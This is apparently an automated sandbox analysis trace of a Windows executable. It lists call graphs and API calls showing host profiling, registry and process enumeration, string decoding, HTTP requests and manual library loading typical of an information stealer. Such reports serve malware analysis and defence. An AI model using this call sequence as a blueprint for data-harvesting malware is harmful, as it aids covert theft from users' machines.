lstrcpy 14611->14612 14613 351a26 14612->14613 14614 35a9b0 4 API calls 14613->14614 14615 351a37 14614->14615 14616 35a8a0 lstrcpy 14615->14616 14617 351a40 14616->14617 14618 35a9b0 4 API calls 14617->14618 14619 351a5b 14618->14619 14620 35a8a0 lstrcpy 14619->14620 14621 351a64 14620->14621 14622 35a9b0 4 API calls 14621->14622 14623 351a7d 14622->14623 14624 35a8a0 lstrcpy 14623->14624 14625 351a86 14624->14625 14626 35a9b0 4 API calls 14625->14626 14627 351aa1 14626->14627 14628 35a8a0 lstrcpy 14627->14628 14629 351aaa 14628->14629 14630 35a9b0 4 API calls 14629->14630 14631 351ac3 14630->14631 14632 35a8a0 lstrcpy 14631->14632 14633 351acc 14632->14633 14634 35a9b0 4 API calls 14633->14634 14635 351ae7 14634->14635 14636 35a8a0 lstrcpy 14635->14636 14637 351af0 14636->14637 14638 35a9b0 4 API calls 14637->14638 14639 351b09 14638->14639 14640 35a8a0 lstrcpy 14639->14640 14641 351b12 14640->14641 14642 35a9b0 4 API calls 14641->14642 14643 351b2d 14642->14643 14644 35a8a0 lstrcpy 14643->14644 14645 351b36 14644->14645 14646 35a9b0 4 API calls 14645->14646 14647 351b4f 14646->14647 14648 35a8a0 lstrcpy 14647->14648 14649 351b58 14648->14649 14650 35a9b0 4 API calls 14649->14650 14651 351b76 14650->14651 14652 35a8a0 lstrcpy 14651->14652 14653 351b7f 14652->14653 14654 357500 6 API calls 14653->14654 14655 351b96 14654->14655 14656 35a920 3 API calls 14655->14656 14657 351ba9 14656->14657 14658 35a8a0 lstrcpy 14657->14658 14659 351bb2 14658->14659 14660 35a9b0 4 API calls 14659->14660 14661 351bdc 14660->14661 14662 35a8a0 lstrcpy 14661->14662 14663 351be5 14662->14663 14664 35a9b0 4 API calls 14663->14664 14665 351c05 14664->14665 14666 35a8a0 lstrcpy 14665->14666 14667 351c0e 14666->14667 15375 357690 GetProcessHeap RtlAllocateHeap 14667->15375 14670 35a9b0 4 API calls 14671 351c2e 14670->14671 14672 35a8a0 lstrcpy 14671->14672 14673 351c37 14672->14673 14674 35a9b0 4 API calls 14673->14674 14675 351c56 14674->14675 14676 35a8a0 lstrcpy 14675->14676 14677 351c5f 14676->14677 14678 35a9b0 4 API calls 14677->14678 14679 351c80 14678->14679 14680 35a8a0 lstrcpy 14679->14680 14681 351c89 14680->14681 15382 3577c0 GetCurrentProcess IsWow64Process 14681->15382 14684 35a9b0 4 API calls 14685 351ca9 14684->14685 14686 35a8a0 lstrcpy 14685->14686 14687 351cb2 14686->14687 14688 35a9b0 4 API calls 14687->14688 14689 351cd1 14688->14689 14690 35a8a0 lstrcpy 14689->14690 14691 351cda 14690->14691 14692 35a9b0 4 API calls 14691->14692 14693 351cfb 14692->14693 14694 35a8a0 lstrcpy 14693->14694 14695 351d04 14694->14695 14696 357850 3 API calls 14695->14696 14697 351d14 14696->14697 14698 35a9b0 4 API calls 14697->14698 14699 351d24 14698->14699 14700 35a8a0 lstrcpy 14699->14700 14701 351d2d 14700->14701 14702 35a9b0 4 API calls 14701->14702 14703 351d4c 14702->14703 14704 35a8a0 lstrcpy 14703->14704 14705 351d55 14704->14705 14706 35a9b0 4 API calls 14705->14706 14707 351d75 14706->14707 14708 35a8a0 lstrcpy 14707->14708 14709 351d7e 14708->14709 14710 3578e0 3 API calls 14709->14710 14711 351d8e 14710->14711 14712 35a9b0 4 API calls 14711->14712 14713 351d9e 14712->14713 14714 35a8a0 lstrcpy 14713->14714 14715 351da7 14714->14715 14716 35a9b0 4 API calls 14715->14716 14717 351dc6 14716->14717 14718 35a8a0 lstrcpy 14717->14718 14719 351dcf 14718->14719 14720 35a9b0 4 API calls 14719->14720 14721 351df0 14720->14721 14722 35a8a0 lstrcpy 14721->14722 14723 351df9 14722->14723 15384 357980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14723->15384 14726 35a9b0 4 API calls 14727 351e19 14726->14727 14728 35a8a0 lstrcpy 14727->14728 14729 351e22 14728->14729 14730 35a9b0 4 API calls 14729->14730 14731 351e41 14730->14731 14732 35a8a0 lstrcpy 14731->14732 14733 351e4a 14732->14733 14734 35a9b0 4 API calls 14733->14734 14735 351e6b 14734->14735 14736 35a8a0 lstrcpy 14735->14736 14737 351e74 14736->14737 15386 357a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14737->15386 14740 35a9b0 4 API calls 14741 351e94 14740->14741 14742 35a8a0 lstrcpy 14741->14742 14743 351e9d 14742->14743 14744 35a9b0 4 API calls 14743->14744 14745 351ebc 14744->14745 14746 35a8a0 lstrcpy 14745->14746 14747 351ec5 14746->14747 14748 35a9b0 4 API calls 14747->14748 14749 351ee5 14748->14749 14750 35a8a0 lstrcpy 14749->14750 14751 351eee 14750->14751 15389 357b00 GetUserDefaultLocaleName 14751->15389 14754 35a9b0 4 API calls 14755 351f0e 14754->14755 14756 35a8a0 lstrcpy 14755->14756 14757 351f17 14756->14757 14758 35a9b0 4 API calls 14757->14758 14759 351f36 14758->14759 14760 35a8a0 lstrcpy 14759->14760 14761 351f3f 14760->14761 14762 35a9b0 4 API calls 14761->14762 14763 351f60 14762->14763 14764 35a8a0 lstrcpy 14763->14764 14765 351f69 14764->14765 15393 357b90 14765->15393 14767 351f80 14768 35a920 3 API calls 14767->14768 14769 351f93 14768->14769 14770 35a8a0 lstrcpy 14769->14770 14771 351f9c 14770->14771 14772 35a9b0 4 API calls 14771->14772 14773 351fc6 14772->14773 14774 35a8a0 lstrcpy 14773->14774 14775 351fcf 14774->14775 14776 35a9b0 4 API calls 14775->14776 14777 351fef 14776->14777 14778 35a8a0 lstrcpy 14777->14778 14779 351ff8 14778->14779 15405 357d80 GetSystemPowerStatus 14779->15405 14782 35a9b0 4 API calls 14783 352018 14782->14783 14784 35a8a0 lstrcpy 14783->14784 14785 352021 14784->14785 14786 35a9b0 4 API calls 14785->14786 14787 352040 14786->14787 14788 35a8a0 lstrcpy 14787->14788 14789 352049 14788->14789 14790 35a9b0 4 API calls 14789->14790 14791 35206a 14790->14791 14792 35a8a0 lstrcpy 14791->14792 14793 352073 14792->14793 14794 35207e GetCurrentProcessId 14793->14794 15407 359470 OpenProcess 14794->15407 14797 35a920 3 API calls 14798 3520a4 14797->14798 14799 35a8a0 lstrcpy 14798->14799 14800 3520ad 14799->14800 14801 35a9b0 4 API calls 14800->14801 14802 3520d7 14801->14802 14803 35a8a0 lstrcpy 14802->14803 14804 3520e0 14803->14804 14805 35a9b0 4 API calls 14804->14805 14806 352100 14805->14806 14807 35a8a0 lstrcpy 14806->14807 14808 352109 14807->14808 15412 357e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14808->15412 14811 35a9b0 4 API calls 14812 352129 14811->14812 14813 35a8a0 lstrcpy 14812->14813 14814 352132 14813->14814 14815 35a9b0 4 API calls 14814->14815 14816 352151 14815->14816 14817 35a8a0 lstrcpy 14816->14817 14818 35215a 14817->14818 14819 35a9b0 4 API calls 14818->14819 14820 35217b 14819->14820 14821 35a8a0 lstrcpy 14820->14821 14822 352184 14821->14822 15416 357f60 14822->15416 14825 35a9b0 4 API calls 14826 3521a4 14825->14826 14827 35a8a0 lstrcpy 14826->14827 14828 3521ad 14827->14828 14829 35a9b0 4 API calls 14828->14829 14830 3521cc 14829->14830 14831 35a8a0 lstrcpy 14830->14831 14832 3521d5 14831->14832 14833 35a9b0 4 API calls 14832->14833 14834 3521f6 14833->14834 14835 35a8a0 lstrcpy 14834->14835 14836 3521ff 14835->14836 15429 357ed0 GetSystemInfo wsprintfA 14836->15429 14839 35a9b0 4 API calls 14840 35221f 14839->14840 14841 35a8a0 lstrcpy 14840->14841 14842 352228 14841->14842 14843 35a9b0 4 API calls 14842->14843 14844 352247 14843->14844 14845 35a8a0 lstrcpy 14844->14845 14846 352250 14845->14846 14847 35a9b0 4 API calls 14846->14847 14848 352270 14847->14848 14849 35a8a0 lstrcpy 14848->14849 14850 352279 14849->14850 15431 358100 GetProcessHeap RtlAllocateHeap 14850->15431 14853 35a9b0 4 API calls 14854 352299 14853->14854 14855 35a8a0 lstrcpy 14854->14855 14856 3522a2 14855->14856 14857 35a9b0 4 API calls 14856->14857 14858 3522c1 14857->14858 14859 35a8a0 lstrcpy 14858->14859 14860 3522ca 14859->14860 14861 35a9b0 4 API calls 14860->14861 14862 3522eb 14861->14862 14863 35a8a0 lstrcpy 14862->14863 14864 3522f4 14863->14864 15437 3587c0 14864->15437 14867 35a920 3 API calls 14868 35231e 14867->14868 14869 35a8a0 lstrcpy 14868->14869 14870 352327 14869->14870 14871 35a9b0 4 API calls 14870->14871 14872 352351 14871->14872 14873 35a8a0 lstrcpy 14872->14873 14874 35235a 14873->14874 14875 35a9b0 4 API calls 14874->14875 14876 35237a 14875->14876 14877 35a8a0 lstrcpy 14876->14877 14878 352383 14877->14878 14879 35a9b0 4 API calls 14878->14879 14880 3523a2 14879->14880 14881 35a8a0 lstrcpy 14880->14881 14882 3523ab 14881->14882 15442 3581f0 14882->15442 14884 3523c2 14885 35a920 3 API calls 14884->14885 14886 3523d5 14885->14886 14887 35a8a0 lstrcpy 14886->14887 14888 3523de 14887->14888 14889 35a9b0 4 API calls 14888->14889 14890 35240a 14889->14890 14891 35a8a0 lstrcpy 14890->14891 14892 352413 14891->14892 14893 35a9b0 4 API calls 14892->14893 14894 352432 14893->14894 14895 35a8a0 lstrcpy 14894->14895 14896 35243b 14895->14896 14897 35a9b0 4 API calls 14896->14897 14898 35245c 14897->14898 14899 35a8a0 lstrcpy 14898->14899 14900 352465 14899->14900 14901 35a9b0 4 API calls 14900->14901 14902 352484 14901->14902 14903 35a8a0 lstrcpy 14902->14903 14904 35248d 14903->14904 14905 35a9b0 4 API calls 14904->14905 14906 3524ae 14905->14906 14907 35a8a0 lstrcpy 14906->14907 14908 3524b7 14907->14908 15450 358320 14908->15450 14910 3524d3 14911 35a920 3 API calls 14910->14911 14912 3524e6 14911->14912 14913 35a8a0 lstrcpy 14912->14913 14914 3524ef 14913->14914 14915 35a9b0 4 API calls 14914->14915 14916 352519 14915->14916 14917 35a8a0 lstrcpy 14916->14917 14918 352522 14917->14918 14919 35a9b0 4 API calls 14918->14919 14920 352543 14919->14920 14921 35a8a0 lstrcpy 14920->14921 14922 35254c 14921->14922 14923 358320 17 API calls 14922->14923 14924 352568 14923->14924 14925 35a920 3 API calls 14924->14925 14926 35257b 14925->14926 14927 35a8a0 lstrcpy 14926->14927 14928 352584 14927->14928 14929 35a9b0 4 API calls 14928->14929 14930 3525ae 14929->14930 14931 35a8a0 lstrcpy 14930->14931 14932 3525b7 14931->14932 14933 35a9b0 4 API calls 14932->14933 14934 3525d6 14933->14934 14935 35a8a0 lstrcpy 14934->14935 14936 3525df 14935->14936 14937 35a9b0 4 API calls 14936->14937 14938 352600 14937->14938 14939 35a8a0 lstrcpy 14938->14939 14940 352609 14939->14940 15486 358680 14940->15486 14942 352620 14943 35a920 3 API calls 14942->14943 14944 352633 14943->14944 14945 35a8a0 lstrcpy 14944->14945 14946 35263c 14945->14946 14947 35265a lstrlen 14946->14947 14948 35266a 14947->14948 14949 35a740 lstrcpy 14948->14949 14950 35267c 14949->14950 14951 341590 lstrcpy 14950->14951 14952 35268d 14951->14952 15496 355190 14952->15496 14954 352699 14954->13386 15684 35aad0 14955->15684 14957 345009 InternetOpenUrlA 14958 345021 14957->14958 14959 3450a0 InternetCloseHandle InternetCloseHandle 14958->14959 14960 34502a InternetReadFile 14958->14960 14961 3450ec 14959->14961 14960->14958 14961->13390 15685 3498d0 14962->15685 14964 350759 14965 35077d 14964->14965 14966 350a38 14964->14966 14968 350799 StrCmpCA 14965->14968 14967 341590 lstrcpy 14966->14967 14969 350a49 14967->14969 14970 3507a8 14968->14970 14997 350843 14968->14997 15861 350250 14969->15861 14972 35a7a0 lstrcpy 14970->14972 14975 3507c3 14972->14975 14974 350865 StrCmpCA 14976 350874 14974->14976 15014 35096b 14974->15014 14977 341590 lstrcpy 14975->14977 14978 35a740 lstrcpy 14976->14978 14979 35080c 14977->14979 14981 350881 14978->14981 14982 35a7a0 lstrcpy 14979->14982 14980 35099c StrCmpCA 14983 3509ab 14980->14983 15003 350a2d 14980->15003 14984 35a9b0 4 API calls 14981->14984 14985 350823 14982->14985 14986 341590 lstrcpy 14983->14986 14987 3508ac 14984->14987 14988 35a7a0 lstrcpy 14985->14988 14989 3509f4 14986->14989 14990 35a920 3 API calls 14987->14990 14991 35083e 14988->14991 14992 35a7a0 lstrcpy 14989->14992 14993 3508b3 14990->14993 15688 34fb00 14991->15688 14995 350a0d 14992->14995 14996 35a9b0 4 API calls 14993->14996 14998 35a7a0 lstrcpy 14995->14998 14999 3508ba 14996->14999 14997->14974 15000 350a28 14998->15000 15001 35a8a0 lstrcpy 14999->15001 15804 350030 15000->15804 15003->13394 15014->14980 15336 35a7a0 lstrcpy 15335->15336 15337 341683 15336->15337 15338 35a7a0 lstrcpy 15337->15338 15339 341695 15338->15339 15340 35a7a0 lstrcpy 15339->15340 15341 3416a7 15340->15341 15342 35a7a0 lstrcpy 15341->15342 15343 3415a3 15342->15343 15343->14217 15345 3447c6 15344->15345 15346 344838 lstrlen 15345->15346 15370 35aad0 15346->15370 15348 344848 InternetCrackUrlA 15349 344867 15348->15349 15349->14294 15351 35a740 lstrcpy 15350->15351 15352 358b74 15351->15352 15353 35a740 lstrcpy 15352->15353 15354 358b82 GetSystemTime 15353->15354 15356 358b99 15354->15356 15355 35a7a0 lstrcpy 15357 358bfc 15355->15357 15356->15355 15357->14309 15359 35a931 15358->15359 15360 35a988 15359->15360 15362 35a968 lstrcpy lstrcat 15359->15362 15361 35a7a0 lstrcpy 15360->15361 15363 35a994 15361->15363 15362->15360 15363->14312 15364->14427 15366 349af9 LocalAlloc 15365->15366 15367 344eee 15365->15367 15366->15367 15368 349b14 CryptStringToBinaryA 15366->15368 15367->14315 15367->14317 15368->15367 15369 349b39 LocalFree 15368->15369 15369->15367 15370->15348 15371->14437 15372->14578 15373->14580 15374->14588 15503 3577a0 15375->15503 15378 3576c6 RegOpenKeyExA 15380 357704 RegCloseKey 15378->15380 15381 3576e7 RegQueryValueExA 15378->15381 15379 351c1e 15379->14670 15380->15379 15381->15380 15383 351c99 15382->15383 15383->14684 15385 351e09 15384->15385 15385->14726 15387 351e84 15386->15387 15388 357a9a wsprintfA 15386->15388 15387->14740 15388->15387 15390 357b4d 15389->15390 15392 351efe 15389->15392 15510 358d20 LocalAlloc CharToOemW 15390->15510 15392->14754 15394 35a740 lstrcpy 15393->15394 15395 357bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15394->15395 15404 357c25 15395->15404 15396 357c46 GetLocaleInfoA 15396->15404 15397 357d18 15398 357d1e LocalFree 15397->15398 15399 357d28 15397->15399 15398->15399 15400 35a7a0 lstrcpy 15399->15400 15403 357d37 15400->15403 15401 35a9b0 lstrcpy lstrlen lstrcpy lstrcat 15401->15404 15402 35a8a0 lstrcpy 15402->15404 15403->14767 15404->15396 15404->15397 15404->15401 15404->15402 15406 352008 15405->15406 15406->14782 15408 3594b5 15407->15408 15409 359493 GetModuleFileNameExA CloseHandle 15407->15409 15410 35a740 lstrcpy 15408->15410 15409->15408 15411 352091 15410->15411 15411->14797 15413 352119 15412->15413 15414 357e68 RegQueryValueExA 15412->15414 15413->14811 15415 357e8e RegCloseKey 15414->15415 15415->15413 15417 357fb9 GetLogicalProcessorInformationEx 15416->15417 15418 357fd8 GetLastError 15417->15418 15420 358029 15417->15420 15427 358022 15418->15427 15428 357fe3 15418->15428 15422 3589f0 2 API calls 15420->15422 15425 35807b 15422->15425 15423 3589f0 2 API calls 15424 352194 15423->15424 15424->14825 15426 358084 wsprintfA 15425->15426 15425->15427 15426->15424 15427->15423 15427->15424 15428->15417 15428->15424 15511 3589f0 15428->15511 15514 358a10 GetProcessHeap RtlAllocateHeap 15428->15514 15430 35220f 15429->15430 15430->14839 15432 3589b0 15431->15432 15433 35814d GlobalMemoryStatusEx 15432->15433 15434 358163 __aulldiv 15433->15434 15435 35819b wsprintfA 15434->15435 15436 352289 15435->15436 15436->14853 15438 3587fb GetProcessHeap RtlAllocateHeap wsprintfA 15437->15438 15440 35a740 lstrcpy 15438->15440 15441 35230b 15440->15441 15441->14867 15443 35a740 lstrcpy 15442->15443 15444 358229 15443->15444 15445 358263 15444->15445 15446 35a9b0 lstrcpy lstrlen lstrcpy lstrcat 15444->15446 15449 35a8a0 lstrcpy 15444->15449 15447 35a7a0 lstrcpy 15445->15447 15446->15444 15448 3582dc 15447->15448 15448->14884 15449->15444 15451 35a740 lstrcpy 15450->15451 15452 35835c RegOpenKeyExA 15451->15452 15453 3583d0 15452->15453 15454 3583ae 15452->15454 15456 358613 RegCloseKey 15453->15456 15457 3583f8 RegEnumKeyExA 15453->15457 15455 35a7a0 lstrcpy 15454->15455 15466 3583bd 15455->15466 15458 35a7a0 lstrcpy 15456->15458 15459 35843f wsprintfA RegOpenKeyExA 15457->15459 15460 35860e 15457->15460 15458->15466 15461 358485 RegCloseKey RegCloseKey 15459->15461 15462 3584c1 RegQueryValueExA 15459->15462 15460->15456 15465 35a7a0 lstrcpy 15461->15465 15463 358601 RegCloseKey 15462->15463 15464 3584fa lstrlen 15462->15464 15463->15460 15464->15463 15467 358510 15464->15467 15465->15466 15466->14910 15468 35a9b0 4 API calls 15467->15468 15469 358527 15468->15469 15470 35a8a0 lstrcpy 15469->15470 15471 358533 15470->15471 15472 35a9b0 4 API calls 15471->15472 15473 358557 15472->15473 15474 35a8a0 lstrcpy 15473->15474 15475 358563 15474->15475 15476 35856e RegQueryValueExA 15475->15476 15476->15463 15477 3585a3 15476->15477 15478 35a9b0 4 API calls 15477->15478 15479 3585ba 15478->15479 15480 35a8a0 lstrcpy 15479->15480 15481 3585c6 15480->15481 15482 35a9b0 4 API calls 15481->15482 15483 3585ea 15482->15483 15484 35a8a0 lstrcpy 15483->15484 15485 3585f6 15484->15485 15485->15463 15487 35a740 lstrcpy 15486->15487 15488 3586bc CreateToolhelp32Snapshot Process32First 15487->15488 15489 35875d CloseHandle 15488->15489 15490 3586e8 Process32Next 15488->15490 15491 35a7a0 lstrcpy 15489->15491 15490->15489 15495 3586fd 15490->15495 15494 358776 15491->15494 15492 35a9b0 lstrcpy lstrlen lstrcpy lstrcat 15492->15495 15493 35a8a0 lstrcpy 15493->15495 15494->14942 15495->15490 15495->15492 15495->15493 15497 35a7a0 lstrcpy 15496->15497 15498 3551b5 15497->15498 15499 341590 lstrcpy 15498->15499 15500 3551c6 15499->15500 15515 345100 15500->15515 15502 3551cf 15502->14954 15506 357720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15503->15506 15505 3576b9 15505->15378 15505->15379 15507 357765 RegQueryValueExA 15506->15507 15508 357780 RegCloseKey 15506->15508 15507->15508 15509 357793 15508->15509 15509->15505 15510->15392 15512 358a0c 15511->15512 15513 3589f9 GetProcessHeap HeapFree 15511->15513 15512->15428 15513->15512 15514->15428 15516 35a7a0 lstrcpy 15515->15516 15517 345119 15516->15517 15518 3447b0 2 API calls 15517->15518 15519 345125 15518->15519 15675 358ea0 15519->15675 15521 345184 15522 345192 lstrlen 15521->15522 15523 3451a5 15522->15523 15524 358ea0 4 API calls 15523->15524 15525 3451b6 15524->15525 15526 35a740 lstrcpy 15525->15526 15527 3451c9 15526->15527 15528 35a740 lstrcpy 15527->15528 15529 3451d6 15528->15529 15530 35a740 lstrcpy 15529->15530 15531 3451e3 15530->15531 15532 35a740 lstrcpy 15531->15532 15533 3451f0 15532->15533 15534 35a740 lstrcpy 15533->15534 15535 3451fd InternetOpenA StrCmpCA 15534->15535 15536 34522f 15535->15536 15537 3458c4 InternetCloseHandle 15536->15537 15538 358b60 3 API calls 15536->15538 15544 3458d9 ctype 15537->15544 15539 34524e 15538->15539 15540 35a920 3 API calls 15539->15540 15541 345261 15540->15541 15542 35a8a0 lstrcpy 15541->15542 15543 34526a 15542->15543 15545 35a9b0 4 API calls 15543->15545 15548 35a7a0 lstrcpy 15544->15548 15546 3452ab 15545->15546 15547 35a920 3 API calls 15546->15547 15549 3452b2 15547->15549 15556 345913 15548->15556 15550 35a9b0 4 API calls 15549->15550 15551 3452b9 15550->15551 15552 35a8a0 lstrcpy 15551->15552 15553 3452c2 15552->15553 15554 35a9b0 4 API calls 15553->15554 15555 345303 15554->15555 15557 35a920 3 API calls 15555->15557 15556->15502 15558 34530a 15557->15558 15559 35a8a0 lstrcpy 15558->15559 15560 345313 15559->15560 15561 345329 InternetConnectA 15560->15561 15561->15537 15562 345359 HttpOpenRequestA 15561->15562 15564 3458b7 InternetCloseHandle 15562->15564 15565 3453b7 15562->15565 15564->15537 15566 35a9b0 4 API calls 15565->15566 15567 3453cb 15566->15567 15568 35a8a0 lstrcpy 15567->15568 15569 3453d4 15568->15569 15570 35a920 3 API calls 15569->15570 15571 3453f2 15570->15571 15572 35a8a0 lstrcpy 15571->15572 15573 3453fb 15572->15573 15574 35a9b0 4 API calls 15573->15574 15575 34541a 15574->15575 15576 35a8a0 lstrcpy 15575->15576 15577 345423 15576->15577 15578 35a9b0 4 API calls 15577->15578 15579 345444 15578->15579 15580 35a8a0 lstrcpy 15579->15580 15581 34544d 15580->15581 15582 35a9b0 4 API calls 15581->15582 15583 34546e 15582->15583 15584 35a8a0 lstrcpy 15583->15584 15585 345477 15584->15585 15676 358ead CryptBinaryToStringA 15675->15676 15677 358ea9 15675->15677 15676->15677 15678 358ece GetProcessHeap RtlAllocateHeap 15676->15678 15677->15521 15678->15677 15679 358ef4 ctype 15678->15679 15680 358f05 CryptBinaryToStringA 15679->15680 15680->15677 15684->14957 15927 349880 15685->15927 15687 3498e1 15687->14964 15689 35a740 lstrcpy 15688->15689 15690 34fb16 15689->15690 15862 35a740 lstrcpy 15861->15862 15863 350266 15862->15863 15864 358de0 2 API calls 15863->15864 15865 35027b 15864->15865 15866 35a920 3 API calls 15865->15866 15867 35028b 15866->15867 15868 35a8a0 lstrcpy 15867->15868 15869 350294 15868->15869 15870 35a9b0 4 API calls 15869->15870 15871 3502b8 15870->15871 15928 34988e 15927->15928 15931 346fb0 15928->15931 15930 3498ad ctype 15930->15687 15934 346d40 15931->15934 15935 346d63 15934->15935 15947 346d59 15934->15947 15935->15947 15948 346660 15935->15948 15937 346dbe 15937->15947 15954 3469b0 15937->15954 15939 346e2a 15940 346ee6 VirtualFree 15939->15940 15942 346ef7 15939->15942 15939->15947 15940->15942 15941 346f41 15945 3589f0 2 API calls 15941->15945 15941->15947 15942->15941 15943 346f26 FreeLibrary 15942->15943 15944 346f38 15942->15944 15943->15942 15946 3589f0 2 API calls 15944->15946 15945->15947 15946->15941 15947->15930 15951 34668f VirtualAlloc 15948->15951 15950 346730 15952 346743 VirtualAlloc 15950->15952 15953 34673c 15950->15953 15951->15950 15951->15953 15952->15953 15953->15937 15955 3469c9 15954->15955 15960 3469d5 15954->15960 15956 346a09 LoadLibraryA 15955->15956 15955->15960 15958 346a32 15956->15958 15956->15960 15957 346ae0 15957->15960 15962 346ba8 GetProcAddress 15957->15962 15958->15957 15964 358a10 GetProcessHeap RtlAllocateHeap 15958->15964 15960->15939 15961 346a8b 15961->15960 15963 3589f0 2 API calls 15961->15963 15962->15957 15962->15960 15963->15957 15964->15961

                            Executed Functions

                            Function 00359860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 660 359860-359874 call 359750 663 359a93-359af2 LoadLibraryA * 5 660->663 664 35987a-359a8e call 359780 GetProcAddress * 21 660->664 666 359af4-359b08 GetProcAddress 663->666 667 359b0d-359b14 663->667 664->663 666->667 669 359b46-359b4d 667->669 670 359b16-359b41 GetProcAddress * 2 667->670 671 359b4f-359b63 GetProcAddress 669->671 672 359b68-359b6f 669->672 670->669 671->672 673 359b71-359b84 GetProcAddress 672->673 674 359b89-359b90 672->674 673->674 675 359bc1-359bc2 674->675 676 359b92-359bbc GetProcAddress * 2 674->676 676->675
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00FB2C00), ref: 003598A1
                            • GetProcAddress.KERNEL32(74DD0000,00FB2AC8), ref: 003598BA
                            • GetProcAddress.KERNEL32(74DD0000,00FB2A20), ref: 003598D2
                            • GetProcAddress.KERNEL32(74DD0000,00FB2C18), ref: 003598EA
                            • GetProcAddress.KERNEL32(74DD0000,00FB2A80), ref: 00359903
                            • GetProcAddress.KERNEL32(74DD0000,00FB98D8), ref: 0035991B
                            • GetProcAddress.KERNEL32(74DD0000,00FA5330), ref: 00359933
                            • GetProcAddress.KERNEL32(74DD0000,00FA5510), ref: 0035994C
                            • GetProcAddress.KERNEL32(74DD0000,00FB2B58), ref: 00359964
                            • GetProcAddress.KERNEL32(74DD0000,00FB2C30), ref: 0035997C
                            • GetProcAddress.KERNEL32(74DD0000,00FB2AF8), ref: 00359995
                            • GetProcAddress.KERNEL32(74DD0000,00FB2978), ref: 003599AD
                            • GetProcAddress.KERNEL32(74DD0000,00FA53D0), ref: 003599C5
                            • GetProcAddress.KERNEL32(74DD0000,00FB2B28), ref: 003599DE
                            • GetProcAddress.KERNEL32(74DD0000,00FB2BA0), ref: 003599F6
                            • GetProcAddress.KERNEL32(74DD0000,00FA5470), ref: 00359A0E
                            • GetProcAddress.KERNEL32(74DD0000,00FB2990), ref: 00359A27
                            • GetProcAddress.KERNEL32(74DD0000,00FB2B10), ref: 00359A3F
                            • GetProcAddress.KERNEL32(74DD0000,00FA53F0), ref: 00359A57
                            • GetProcAddress.KERNEL32(74DD0000,00FB2B40), ref: 00359A70
                            • GetProcAddress.KERNEL32(74DD0000,00FA5450), ref: 00359A88
                            • LoadLibraryA.KERNEL32(00FB2B70,?,00356A00), ref: 00359A9A
                            • LoadLibraryA.KERNEL32(00FB2C60,?,00356A00), ref: 00359AAB
                            • LoadLibraryA.KERNEL32(00FB29A8,?,00356A00), ref: 00359ABD
                            • LoadLibraryA.KERNEL32(00FB29C0,?,00356A00), ref: 00359ACF
                            • LoadLibraryA.KERNEL32(00FB29D8,?,00356A00), ref: 00359AE0
                            • GetProcAddress.KERNEL32(75A70000,00FB2A08), ref: 00359B02
                            • GetProcAddress.KERNEL32(75290000,00FB2A38), ref: 00359B23
                            • GetProcAddress.KERNEL32(75290000,00FB2A50), ref: 00359B3B
                            • GetProcAddress.KERNEL32(75BD0000,00FB2A98), ref: 00359B5D
                            • GetProcAddress.KERNEL32(75450000,00FA54F0), ref: 00359B7E
                            • GetProcAddress.KERNEL32(76E90000,00FB98F8), ref: 00359B9F
                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00359BB6
                            Strings
                            • NtQueryInformationProcess, xrefs: 00359BAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.1745843569.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                            • Associated: 00000000.00000002.1745829366.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745843569.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000721000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000817000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.0000000000820000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1745968455.000000000082F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746185371.0000000000830000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746279795.00000000009C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1746290453.00000000009C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_340000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: ab4b9f6fa76291a090a3267e70030cc16ee200e467ccf80c57449b1f86eeaaea
                            • Instruction ID: e6b83238ca2af01277eb418c40aa074ab618988316c6f535d4d2c7b71294388a
                            • Opcode Fuzzy Hash: ab4b9f6fa76291a090a3267e70030cc16ee200e467ccf80c57449b1f86eeaaea
                            • Instruction Fuzzy Hash: 08A15BB55002409FF348EFA8ED88A6637F9F768701704651BAE45F3225D739A44AFF22
                            Function 003445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 764 3445c0-344695 RtlAllocateHeap 781 3446a0-3446a6 764->781 782 3446ac-34474a 781->782 783 34474f-3447a9 VirtualProtect 781->783 782->781
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0034460F
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0034479C
                            Strings
